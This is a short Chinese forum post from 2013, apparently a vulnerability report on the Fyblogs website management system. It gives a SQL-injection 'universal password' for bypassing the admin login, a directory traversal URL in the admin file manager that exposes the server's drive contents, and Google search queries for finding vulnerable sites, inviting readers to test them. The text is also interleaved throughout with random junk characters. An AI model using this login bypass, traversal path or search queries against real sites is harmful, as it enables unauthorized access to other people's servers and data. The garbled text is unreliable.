漏洞类型: 未授权访问/权限绕过) H5 z& i! }. b! ^" w1 [
9 B# M1 j/ Z1 p# ^' @
简要描述:% R+ ?8 o: x3 f: W H
' J- n" ~0 B: F
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
. v- B% \3 ?- k/ V6 E) N
& N4 A9 n3 e3 E4 ~详细说明:
/ e2 M' T! O$ u
' f( U8 G; D) r+ l* n$ I后台万能密码 'or'='or'
E; I; l$ M4 h% [! G后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% u7 g$ x- l) z6 o5 M* R7 Zadmin/uploadfile.asp?currentFolder=/upfiles/../
6 \, H/ e0 p! l$ _2 x) d
" m$ W W0 Q9 A+ n8 C: q' q2 {漏洞证明:
- t8 I# a0 c; u# C" H) D9 T/ e
1 q8 f+ f& n: `谷歌:inurl:type.asp?id=1 新闻中心. E; O, V# v6 s! q0 Z, [
或者 :inurl:download_ok.asp?
, i3 p5 ^* D( J" K! D. m& I, {6 ~
9 A$ A0 F6 ^8 ~9 y可以测试$ R3 w9 E' g% ^( L" |( L2 K
1 \# S0 r7 E5 W* C8 S- s$ l/ G, U4 v
|
发表于 2013-3-7 13:07:46
收藏
分享
支持
反对